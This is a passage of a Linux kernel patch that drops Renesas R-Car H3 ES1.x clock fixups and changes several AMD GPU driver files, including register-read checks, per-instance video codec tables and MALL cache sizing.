+-	{ MOD_CLK_ID(219), R8A7795_CLK_S3D1 },	/* SYS-DMAC0 */
+-	{ MOD_CLK_ID(408), R8A7795_CLK_S3D1 },	/* INTC-AP */
+-	{ MOD_CLK_ID(501), R8A7795_CLK_S3D1 },	/* AUDMAC1 */
+-	{ MOD_CLK_ID(502), R8A7795_CLK_S3D1 },	/* AUDMAC0 */
+-	{ MOD_CLK_ID(523), R8A7795_CLK_S3D4 },	/* PWM */
+-	{ MOD_CLK_ID(601), R8A7795_CLK_S2D1 },	/* FCPVD2 */
+-	{ MOD_CLK_ID(602), R8A7795_CLK_S2D1 },	/* FCPVD1 */
+-	{ MOD_CLK_ID(603), R8A7795_CLK_S2D1 },	/* FCPVD0 */
+-	{ MOD_CLK_ID(606), R8A7795_CLK_S2D1 },	/* FCPVB1 */
+-	{ MOD_CLK_ID(607), R8A7795_CLK_S2D1 },	/* FCPVB0 */
+-	{ MOD_CLK_ID(610), R8A7795_CLK_S2D1 },	/* FCPVI1 */
+-	{ MOD_CLK_ID(611), R8A7795_CLK_S2D1 },	/* FCPVI0 */
+-	{ MOD_CLK_ID(614), R8A7795_CLK_S2D1 },	/* FCPF1 */
+-	{ MOD_CLK_ID(615), R8A7795_CLK_S2D1 },	/* FCPF0 */
+-	{ MOD_CLK_ID(619), R8A7795_CLK_S2D1 },	/* FCPCS */
+-	{ MOD_CLK_ID(621), R8A7795_CLK_S2D1 },	/* VSPD2 */
+-	{ MOD_CLK_ID(622), R8A7795_CLK_S2D1 },	/* VSPD1 */
+-	{ MOD_CLK_ID(623), R8A7795_CLK_S2D1 },	/* VSPD0 */
+-	{ MOD_CLK_ID(624), R8A7795_CLK_S2D1 },	/* VSPBC */
+-	{ MOD_CLK_ID(626), R8A7795_CLK_S2D1 },	/* VSPBD */
+-	{ MOD_CLK_ID(630), R8A7795_CLK_S2D1 },	/* VSPI1 */
+-	{ MOD_CLK_ID(631), R8A7795_CLK_S2D1 },	/* VSPI0 */
+-	{ MOD_CLK_ID(804), R8A7795_CLK_S2D1 },	/* VIN7 */
+-	{ MOD_CLK_ID(805), R8A7795_CLK_S2D1 },	/* VIN6 */
+-	{ MOD_CLK_ID(806), R8A7795_CLK_S2D1 },	/* VIN5 */
+-	{ MOD_CLK_ID(807), R8A7795_CLK_S2D1 },	/* VIN4 */
+-	{ MOD_CLK_ID(808), R8A7795_CLK_S2D1 },	/* VIN3 */
+-	{ MOD_CLK_ID(809), R8A7795_CLK_S2D1 },	/* VIN2 */
+-	{ MOD_CLK_ID(810), R8A7795_CLK_S2D1 },	/* VIN1 */
+-	{ MOD_CLK_ID(811), R8A7795_CLK_S2D1 },	/* VIN0 */
+-	{ MOD_CLK_ID(812), R8A7795_CLK_S3D2 },	/* EAVB-IF */
+-	{ MOD_CLK_ID(820), R8A7795_CLK_S2D1 },	/* IMR3 */
+-	{ MOD_CLK_ID(821), R8A7795_CLK_S2D1 },	/* IMR2 */
+-	{ MOD_CLK_ID(822), R8A7795_CLK_S2D1 },	/* IMR1 */
+-	{ MOD_CLK_ID(823), R8A7795_CLK_S2D1 },	/* IMR0 */
+-	{ MOD_CLK_ID(905), R8A7795_CLK_CP },	/* GPIO7 */
+-	{ MOD_CLK_ID(906), R8A7795_CLK_CP },	/* GPIO6 */
+-	{ MOD_CLK_ID(907), R8A7795_CLK_CP },	/* GPIO5 */
+-	{ MOD_CLK_ID(908), R8A7795_CLK_CP },	/* GPIO4 */
+-	{ MOD_CLK_ID(909), R8A7795_CLK_CP },	/* GPIO3 */
+-	{ MOD_CLK_ID(910), R8A7795_CLK_CP },	/* GPIO2 */
+-	{ MOD_CLK_ID(911), R8A7795_CLK_CP },	/* GPIO1 */
+-	{ MOD_CLK_ID(912), R8A7795_CLK_CP },	/* GPIO0 */
+-	{ MOD_CLK_ID(918), R8A7795_CLK_S3D2 },	/* I2C6 */
+-	{ MOD_CLK_ID(919), R8A7795_CLK_S3D2 },	/* I2C5 */
+-	{ MOD_CLK_ID(927), R8A7795_CLK_S3D2 },	/* I2C4 */
+-	{ MOD_CLK_ID(928), R8A7795_CLK_S3D2 },	/* I2C3 */
+-};
+-
+-
+-	/*
+-	 * Fixups for R-Car H3 ES2.x
+-	 */
+-
+-static const unsigned int r8a7795es2_mod_nullify[] __initconst = {
+-	MOD_CLK_ID(117),			/* FDP1-2 */
+-	MOD_CLK_ID(327),			/* USB3-IF1 */
+-	MOD_CLK_ID(600),			/* FCPVD3 */
+-	MOD_CLK_ID(609),			/* FCPVI2 */
+-	MOD_CLK_ID(613),			/* FCPF2 */
+-	MOD_CLK_ID(616),			/* FCPCI1 */
+-	MOD_CLK_ID(617),			/* FCPCI0 */
+-	MOD_CLK_ID(620),			/* VSPD3 */
+-	MOD_CLK_ID(629),			/* VSPI2 */
+-	MOD_CLK_ID(713),			/* CSI21 */
+-};
+-
+ static int __init r8a7795_cpg_mssr_init(struct device *dev)
+ {
+ 	const struct rcar_gen3_cpg_pll_config *cpg_pll_config;
+ 	u32 cpg_mode;
+ 	int error;
+ 
++	/*
++	 * We panic here to ensure removed SoCs and clk updates are always in
++	 * sync to avoid overclocking damages. The panic can only be seen with
++	 * commandline args 'earlycon keep_bootcon'. But these SoCs were for
++	 * developers only anyhow.
++	 */
++	if (soc_device_match(r8a7795_denylist))
++		panic("SoC not supported anymore!\n");
++
+ 	error = rcar_rst_read_mode_pins(&cpg_mode);
+ 	if (error)
+ 		return error;
+@@ -457,25 +370,6 @@ static int __init r8a7795_cpg_mssr_init(struct device *dev)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (soc_device_match(r8a7795es1)) {
+-		cpg_core_nullify_range(r8a7795_core_clks,
+-				       ARRAY_SIZE(r8a7795_core_clks),
+-				       R8A7795_CLK_S0D2, R8A7795_CLK_S0D12);
+-		mssr_mod_nullify(r8a7795_mod_clks,
+-				 ARRAY_SIZE(r8a7795_mod_clks),
+-				 r8a7795es1_mod_nullify,
+-				 ARRAY_SIZE(r8a7795es1_mod_nullify));
+-		mssr_mod_reparent(r8a7795_mod_clks,
+-				  ARRAY_SIZE(r8a7795_mod_clks),
+-				  r8a7795es1_mod_reparent,
+-				  ARRAY_SIZE(r8a7795es1_mod_reparent));
+-	} else {
+-		mssr_mod_nullify(r8a7795_mod_clks,
+-				 ARRAY_SIZE(r8a7795_mod_clks),
+-				 r8a7795es2_mod_nullify,
+-				 ARRAY_SIZE(r8a7795es2_mod_nullify));
+-	}
+-
+ 	return rcar_gen3_cpg_init(cpg_pll_config, CLK_EXTALR, cpg_mode);
+ }
+ 
+diff --git a/drivers/clk/renesas/rcar-gen3-cpg.c b/drivers/clk/renesas/rcar-gen3-cpg.c
+index e668f23c75e7d..b3ef62fa612e3 100644
+--- a/drivers/clk/renesas/rcar-gen3-cpg.c
++++ b/drivers/clk/renesas/rcar-gen3-cpg.c
+@@ -310,19 +310,10 @@ static unsigned int cpg_clk_extalr __initdata;
+ static u32 cpg_mode __initdata;
+ static u32 cpg_quirks __initdata;
+ 
+-#define PLL_ERRATA	BIT(0)		/* Missing PLL0/2/4 post-divider */
+ #define RCKCR_CKSEL	BIT(1)		/* Manual RCLK parent selection */
+ 
+ 
+ static const struct soc_device_attribute cpg_quirks_match[] __initconst = {
+-	{
+-		.soc_id = "r8a7795", .revision = "ES1.0",
+-		.data = (void *)(PLL_ERRATA | RCKCR_CKSEL),
+-	},
+-	{
+-		.soc_id = "r8a7795", .revision = "ES1.*",
+-		.data = (void *)(RCKCR_CKSEL),
+-	},
+ 	{
+ 		.soc_id = "r8a7796", .revision = "ES1.0",
+ 		.data = (void *)(RCKCR_CKSEL),
+@@ -355,9 +346,8 @@ struct clk * __init rcar_gen3_cpg_clk_register(struct device *dev,
+ 		 * multiplier when cpufreq changes between normal and boost
+ 		 * modes.
+ 		 */
+-		mult = (cpg_quirks & PLL_ERRATA) ? 4 : 2;
+ 		return cpg_pll_clk_register(core->name, __clk_get_name(parent),
+-					    base, mult, CPG_PLL0CR, 0);
++					    base, 2, CPG_PLL0CR, 0);
+ 
+ 	case CLK_TYPE_GEN3_PLL1:
+ 		mult = cpg_pll_config->pll1_mult;
+@@ -370,9 +360,8 @@ struct clk * __init rcar_gen3_cpg_clk_register(struct device *dev,
+ 		 * multiplier when cpufreq changes between normal and boost
+ 		 * modes.
+ 		 */
+-		mult = (cpg_quirks & PLL_ERRATA) ? 4 : 2;
+ 		return cpg_pll_clk_register(core->name, __clk_get_name(parent),
+-					    base, mult, CPG_PLL2CR, 2);
++					    base, 2, CPG_PLL2CR, 2);
+ 
+ 	case CLK_TYPE_GEN3_PLL3:
+ 		mult = cpg_pll_config->pll3_mult;
+@@ -388,8 +377,6 @@ struct clk * __init rcar_gen3_cpg_clk_register(struct device *dev,
+ 		 */
+ 		value = readl(base + CPG_PLL4CR);
+ 		mult = (((value >> 24) & 0x7f) + 1) * 2;
+-		if (cpg_quirks & PLL_ERRATA)
+-			mult *= 2;
+ 		break;
+ 
+ 	case CLK_TYPE_GEN3_SDH:
+diff --git a/drivers/clk/renesas/renesas-cpg-mssr.c b/drivers/clk/renesas/renesas-cpg-mssr.c
+index 1a0cdf001b2f2..523fd45231571 100644
+--- a/drivers/clk/renesas/renesas-cpg-mssr.c
++++ b/drivers/clk/renesas/renesas-cpg-mssr.c
+@@ -1113,19 +1113,6 @@ static int __init cpg_mssr_init(void)
+ 
+ subsys_initcall(cpg_mssr_init);
+ 
+-void __init cpg_core_nullify_range(struct cpg_core_clk *core_clks,
+-				   unsigned int num_core_clks,
+-				   unsigned int first_clk,
+-				   unsigned int last_clk)
+-{
+-	unsigned int i;
+-
+-	for (i = 0; i < num_core_clks; i++)
+-		if (core_clks[i].id >= first_clk &&
+-		    core_clks[i].id <= last_clk)
+-			core_clks[i].name = NULL;
+-}
+-
+ void __init mssr_mod_nullify(struct mssr_mod_clk *mod_clks,
+ 			     unsigned int num_mod_clks,
+ 			     const unsigned int *clks, unsigned int n)
+@@ -1139,19 +1126,5 @@ void __init mssr_mod_nullify(struct mssr_mod_clk *mod_clks,
+ 		}
+ }
+ 
+-void __init mssr_mod_reparent(struct mssr_mod_clk *mod_clks,
+-			      unsigned int num_mod_clks,
+-			      const struct mssr_mod_reparent *clks,
+-			      unsigned int n)
+-{
+-	unsigned int i, j;
+-
+-	for (i = 0, j = 0; i < num_mod_clks && j < n; i++)
+-		if (mod_clks[i].id == clks[j].clk) {
+-			mod_clks[i].parent = clks[j].parent;
+-			j++;
+-		}
+-}
+-
+ MODULE_DESCRIPTION("Renesas CPG/MSSR Driver");
+ MODULE_LICENSE("GPL v2");
+diff --git a/drivers/clk/renesas/renesas-cpg-mssr.h b/drivers/clk/renesas/renesas-cpg-mssr.h
+index 1c3c057d17f53..80c5b462924ac 100644
+--- a/drivers/clk/renesas/renesas-cpg-mssr.h
++++ b/drivers/clk/renesas/renesas-cpg-mssr.h
+@@ -187,21 +187,7 @@ void __init cpg_mssr_early_init(struct device_node *np,
+     /*
+      * Helpers for fixing up clock tables depending on SoC revision
+      */
+-
+-struct mssr_mod_reparent {
+-	unsigned int clk, parent;
+-};
+-
+-
+-extern void cpg_core_nullify_range(struct cpg_core_clk *core_clks,
+-				   unsigned int num_core_clks,
+-				   unsigned int first_clk,
+-				   unsigned int last_clk);
+ extern void mssr_mod_nullify(struct mssr_mod_clk *mod_clks,
+ 			     unsigned int num_mod_clks,
+ 			     const unsigned int *clks, unsigned int n);
+-extern void mssr_mod_reparent(struct mssr_mod_clk *mod_clks,
+-			      unsigned int num_mod_clks,
+-			      const struct mssr_mod_reparent *clks,
+-			      unsigned int n);
+ #endif
+diff --git a/drivers/gpu/drm/amd/amdgpu/nv.c b/drivers/gpu/drm/amd/amdgpu/nv.c
+index 6853b93ac82e7..df3388e8dec00 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nv.c
++++ b/drivers/gpu/drm/amd/amdgpu/nv.c
+@@ -393,9 +393,10 @@ static int nv_read_register(struct amdgpu_device *adev, u32 se_num,
+ 	*value = 0;
+ 	for (i = 0; i < ARRAY_SIZE(nv_allowed_read_registers); i++) {
+ 		en = &nv_allowed_read_registers[i];
+-		if (adev->reg_offset[en->hwip][en->inst] &&
+-		    reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
+-				   + en->reg_offset))
++		if (!adev->reg_offset[en->hwip][en->inst])
++			continue;
++		else if (reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
++					+ en->reg_offset))
+ 			continue;
+ 
+ 		*value = nv_get_register_value(adev,
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc15.c b/drivers/gpu/drm/amd/amdgpu/soc15.c
+index 7cd17dda32ceb..2eddd7f6cd41e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc15.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc15.c
+@@ -439,8 +439,9 @@ static int soc15_read_register(struct amdgpu_device *adev, u32 se_num,
+ 	*value = 0;
+ 	for (i = 0; i < ARRAY_SIZE(soc15_allowed_read_registers); i++) {
+ 		en = &soc15_allowed_read_registers[i];
+-		if (adev->reg_offset[en->hwip][en->inst] &&
+-			reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
++		if (!adev->reg_offset[en->hwip][en->inst])
++			continue;
++		else if (reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
+ 					+ en->reg_offset))
+ 			continue;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 7050238c4c489..3d938b52178e3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -48,19 +48,31 @@
+ static const struct amd_ip_funcs soc21_common_ip_funcs;
+ 
+ /* SOC21 */
+-static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_encode_array[] =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_encode_array_vcn0[] =
+ {
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 2304, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 2304, 0)},
+ };
+ 
+-static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_encode =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_encode_array_vcn1[] =
+ {
+-	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_encode_array),
+-	.codec_array = vcn_4_0_0_video_codecs_encode_array,
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 2304, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 2304, 0)},
++};
++
++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_encode_vcn0 =
++{
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_encode_array_vcn0),
++	.codec_array = vcn_4_0_0_video_codecs_encode_array_vcn0,
++};
++
++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_encode_vcn1 =
++{
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_encode_array_vcn1),
++	.codec_array = vcn_4_0_0_video_codecs_encode_array_vcn1,
+ };
+ 
+-static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array[] =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array_vcn0[] =
+ {
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+@@ -69,23 +81,47 @@ static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array[
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_AV1, 8192, 4352, 0)},
+ };
+ 
+-static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_decode =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array_vcn1[] =
+ {
+-	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_decode_array),
+-	.codec_array = vcn_4_0_0_video_codecs_decode_array,
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
++};
++
++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_decode_vcn0 =
++{
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_decode_array_vcn0),
++	.codec_array = vcn_4_0_0_video_codecs_decode_array_vcn0,
++};
++
++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_decode_vcn1 =
++{
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_decode_array_vcn1),
++	.codec_array = vcn_4_0_0_video_codecs_decode_array_vcn1,
+ };
+ 
+ static int soc21_query_video_codecs(struct amdgpu_device *adev, bool encode,
+ 				 const struct amdgpu_video_codecs **codecs)
+ {
+-	switch (adev->ip_versions[UVD_HWIP][0]) {
++	if (adev->vcn.num_vcn_inst == hweight8(adev->vcn.harvest_config))
++		return -EINVAL;
+ 
++	switch (adev->ip_versions[UVD_HWIP][0]) {
+ 	case IP_VERSION(4, 0, 0):
+ 	case IP_VERSION(4, 0, 2):
+-		if (encode)
+-			*codecs = &vcn_4_0_0_video_codecs_encode;
+-		else
+-			*codecs = &vcn_4_0_0_video_codecs_decode;
++	case IP_VERSION(4, 0, 4):
++		if (adev->vcn.harvest_config & AMDGPU_VCN_HARVEST_VCN0) {
++			if (encode)
++				*codecs = &vcn_4_0_0_video_codecs_encode_vcn1;
++			else
++				*codecs = &vcn_4_0_0_video_codecs_decode_vcn1;
++		} else {
++			if (encode)
++				*codecs = &vcn_4_0_0_video_codecs_encode_vcn0;
++			else
++				*codecs = &vcn_4_0_0_video_codecs_decode_vcn0;
++		}
+ 		return 0;
+ 	default:
+ 		return -EINVAL;
+@@ -255,9 +291,10 @@ static int soc21_read_register(struct amdgpu_device *adev, u32 se_num,
+ 	*value = 0;
+ 	for (i = 0; i < ARRAY_SIZE(soc21_allowed_read_registers); i++) {
+ 		en = &soc21_allowed_read_registers[i];
+-		if (adev->reg_offset[en->hwip][en->inst] &&
+-		    reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
+-				   + en->reg_offset))
++		if (!adev->reg_offset[en->hwip][en->inst])
++			continue;
++		else if (reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
++					+ en->reg_offset))
+ 			continue;
+ 
+ 		*value = soc21_get_register_value(adev,
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c b/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c
+index cd4e61bf04939..3ac599f74fea8 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c
+@@ -280,7 +280,7 @@ phys_addr_t kfd_get_process_doorbells(struct kfd_process_device *pdd)
+ 	if (!pdd->doorbell_index) {
+ 		int r = kfd_alloc_process_doorbells(pdd->dev,
+ 						    &pdd->doorbell_index);
+-		if (r)
++		if (r < 0)
+ 			return 0;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index e4dbc8353ea33..9c532167ff466 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -2149,13 +2149,19 @@ static bool dcn32_resource_construct(
+ 	dc->caps.max_cursor_size = 64;
+ 	dc->caps.min_horizontal_blanking_period = 80;
+ 	dc->caps.dmdata_alloc_size = 2048;
+-	dc->caps.mall_size_per_mem_channel = 0;
++	dc->caps.mall_size_per_mem_channel = 4;
+ 	dc->caps.mall_size_total = 0;
+ 	dc->caps.cursor_cache_size = dc->caps.max_cursor_size * dc->caps.max_cursor_size * 8;
+ 
+ 	dc->caps.cache_line_size = 64;
+ 	dc->caps.cache_num_ways = 16;
+-	dc->caps.max_cab_allocation_bytes = 67108864; // 64MB = 1024 * 1024 * 64
++
++	/* Calculate the available MALL space */
++	dc->caps.max_cab_allocation_bytes = dcn32_calc_num_avail_chans_for_mall(
++		dc, dc->ctx->dc_bios->vram_info.num_chans) *
++		dc->caps.mall_size_per_mem_channel * 1024 * 1024;
++	dc->caps.mall_size_total = dc->caps.max_cab_allocation_bytes;
++
+ 	dc->caps.subvp_fw_processing_delay_us = 15;
+ 	dc->caps.subvp_drr_max_vblank_margin_us = 40;
+ 	dc->caps.subvp_prefetch_end_to_mall_start_us = 15;
+@@ -2592,3 +2598,55 @@ struct pipe_ctx *dcn32_acquire_idle_pipe_for_head_pipe_in_layer(
+ 
+ 	return idle_pipe;
+ }
++
++unsigned int dcn32_calc_num_avail_chans_for_mall(struct dc *dc, int num_chans)
++{
++	/*
++	 * DCN32 and DCN321 SKUs may have different sizes for MALL
++	 *  but we may not be able to access all the MALL space.
++	 *  If the num_chans is power of 2, then we can access all
++	 *  of the available MALL space.  Otherwise, we can only
++	 *  access:
++	 *
++	 *  max_cab_size_in_bytes = total_cache_size_in_bytes *
++	 *    ((2^floor(log2(num_chans)))/num_chans)
++	 *
++	 * Calculating the MALL sizes for all available SKUs, we
++	 *  have come up with the follow simplified check.
++	 * - we have max_chans which provides the max MALL size.
++	 *  Each chans supports 4MB of MALL so:
++	 *
++	 *  total_cache_size_in_bytes = max_chans * 4 MB
++	 *
++	 * - we have avail_chans which shows the number of channels
++	 *  we can use if we can't access the entire MALL space.
++	 *  It is generally half of max_chans
++	 * - so we use the following checks:
++	 *
++	 *   if (num_chans == max_chans), return max_chans
++	 *   if (num_chans < max_chans), return avail_chans
++	 *
++	 * - exception is GC_11_0_0 where we can't access max_chans,
++	 *  so we define max_avail_chans as the maximum available
++	 *  MALL space
++	 *
++	 */
++	int gc_11_0_0_max_chans = 48;
++	int gc_11_0_0_max_avail_chans = 32;
++	int gc_11_0_0_avail_chans = 16;
++	int gc_11_0_3_max_chans = 16;
++	int gc_11_0_3_avail_chans = 8;
++	int gc_11_0_2_max_chans = 8;
++	int gc_11_0_2_avail_chans = 4;
++
++	if (ASICREV_IS_GC_11_0_0(dc->ctx->asic_id.hw_internal_rev)) {
++		return (num_chans == gc_11_0_0_max_chans) ?
++			gc_11_0_0_max_avail_chans : gc_11_0_0_avail_chans;
++	} else if (ASICREV_IS_GC_11_0_2(dc->ctx->asic_id.hw_internal_rev)) {
++		return (num_chans == gc_11_0_2_max_chans) ?
++			gc_11_0_2_max_chans : gc_11_0_2_avail_chans;
++	} else { // if (ASICREV_IS_GC_11_0_3(dc->ctx->asic_id.hw_internal_rev)) {
++		return (num_chans == gc_11_0_3_max_chans) ?
++			gc_11_0_3_max_chans : gc_11_0_3_avail_chans;
++	}
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+index 13fbc574910bb..434b743fa4cb7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+@@ -134,6 +134,10 @@ void dcn32_restore_mall_state(struct dc *dc,
+ 		struct dc_state *context,
+ 		struct mall_temp_config *temp_config);
+ 
++bool dcn32_allow_subvp_with_active_margin(struct pipe_ctx *pipe);
++
++unsigned int dcn32_calc_num_avail_chans_for_mall(struct dc *dc, int num_chans);
++
+ /* definitions for run time init of reg offsets */
+ 
+ /* CLK SRC */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+index d1f36df03c2ee..1709b6edb89c9 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+@@ -1702,11 +1702,18 @@ static bool dcn321_resource_construct(
+ 	dc->caps.max_cursor_size = 64;
+ 	dc->caps.min_horizontal_blanking_period = 80;
+ 	dc->caps.dmdata_alloc_size = 2048;
+-	dc->caps.mall_size_per_mem_channel = 0;
++	dc->caps.mall_size_per_mem_channel = 4;
+ 	dc->caps.mall_size_total = 0;
+ 	dc->caps.cursor_cache_size = dc->caps.max_cursor_size * dc->caps.max_cursor_size * 8;
+ 	dc->caps.cache_line_size = 64;
+ 	dc->caps.cache_num_ways = 16;
++
++	/* Calculate the available MALL space */
++	dc->caps.max_cab_allocation_bytes = dcn32_calc_num_avail_chans_for_mall(
++		dc, dc->ctx->dc_bios->vram_info.num_chans) *
++		dc->caps.mall_size_per_mem_channel * 1024 * 1024;
++	dc->caps.mall_size_total = dc->caps.max_cab_allocation_bytes;
++
+ 	dc->caps.max_cab_allocation_bytes = 33554432; // 32MB = 1024 * 1024 * 32
+ 	dc->caps.subvp_fw_processing_delay_us = 15;
+ 	dc->caps.subvp_drr_max_vblank_margin_us = 40;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index 69e205ac58b25..3b6194f0fe513 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -693,7 +693,9 @@ static bool dcn32_assign_subvp_pipe(struct dc *dc,
+ 		 */
+ 		if (pipe->plane_state && !pipe->top_pipe &&
+ 				pipe->stream->mall_stream_config.type == SUBVP_NONE && refresh_rate < 120 && !pipe->plane_state->address.tmz_surface &&
+-				vba->ActiveDRAMClockChangeLatencyMarginPerState[vba->VoltageLevel][vba->maxMpcComb][vba->pipe_plane[pipe_idx]] <= 0) {
++				(vba->ActiveDRAMClockChangeLatencyMarginPerState[vba->VoltageLevel][vba->maxMpcComb][vba->pipe_plane[pipe_idx]] <= 0 ||
++				(vba->ActiveDRAMClockChangeLatencyMarginPerState[vba->VoltageLevel][vba->maxMpcComb][vba->pipe_plane[pipe_idx]] > 0 &&
++						dcn32_allow_subvp_with_active_margin(pipe)))) {
+ 			while (pipe) {
+ 				num_pipes++;
+ 				pipe = pipe->bottom_pipe;
+@@ -2451,8 +2453,11 @@ void dcn32_update_bw_bounding_box_fpu(struct dc *dc, struct clk_bw_params *bw_pa
+ 		}
+ 
+ 		/* Override from VBIOS for num_chan */
+-		if (dc->ctx->dc_bios->vram_info.num_chans)
++		if (dc->ctx->dc_bios->vram_info.num_chans) {
+ 			dcn3_2_soc.num_chans = dc->ctx->dc_bios->vram_info.num_chans;
++			dcn3_2_soc.mall_allocated_for_dcn_mbytes = (double)(dcn32_calc_num_avail_chans_for_mall(dc,
++				dc->ctx->dc_bios->vram_info.num_chans) * dc->caps.mall_size_per_mem_channel);
++		}
+ 
+ 		if (dc->ctx->dc_bios->vram_info.dram_channel_width_bytes)
+ 			dcn3_2_soc.dram_channel_width_bytes = dc->ctx->dc_bios->vram_info.dram_channel_width_bytes;
+@@ -2630,3 +2635,30 @@ void dcn32_zero_pipe_dcc_fraction(display_e2e_pipe_params_st *pipes,
+ 	pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_luma = 0;
+ 	pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_chroma = 0;
+ }
++
++bool dcn32_allow_subvp_with_active_margin(struct pipe_ctx *pipe)
++{
++	bool allow = false;
++	uint32_t refresh_rate = 0;
++
++	/* Allow subvp on displays that have active margin for 2560x1440@60hz displays
++	 * only for now. There must be no scaling as well.
++	 *
++	 * For now we only enable on 2560x1440@60hz displays to enable 4K60 + 1440p60 configs
++	 * for p-state switching.
++	 */
++	if (pipe->stream && pipe->plane_state) {
++		refresh_rate = (pipe->stream->timing.pix_clk_100hz * 100 +
++						pipe->stream->timing.v_total * pipe->stream->timing.h_total - 1)
++						/ (double)(pipe->stream->timing.v_total * pipe->stream->timing.h_total);
++		if (pipe->stream->timing.v_addressable == 1440 &&
++				pipe->stream->timing.h_addressable == 2560 &&
++				refresh_rate >= 55 && refresh_rate <= 65 &&
++				pipe->plane_state->src_rect.height == 1440 &&
++				pipe->plane_state->src_rect.width == 2560 &&
++				pipe->plane_state->dst_rect.height == 1440 &&
++				pipe->plane_state->dst_rect.width == 2560)
++			allow = true;
++	}
++	return allow;
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+index 0ea406145c1d7..b80cef70fa60f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+@@ -534,8 +534,11 @@ void dcn321_update_bw_bounding_box_fpu(struct dc *dc, struct clk_bw_params *bw_p
+ 		}
+ 
+ 		/* Override from VBIOS for num_chan */
+-		if (dc->ctx->dc_bios->vram_info.num_chans)
++		if (dc->ctx->dc_bios->vram_info.num_chans) {
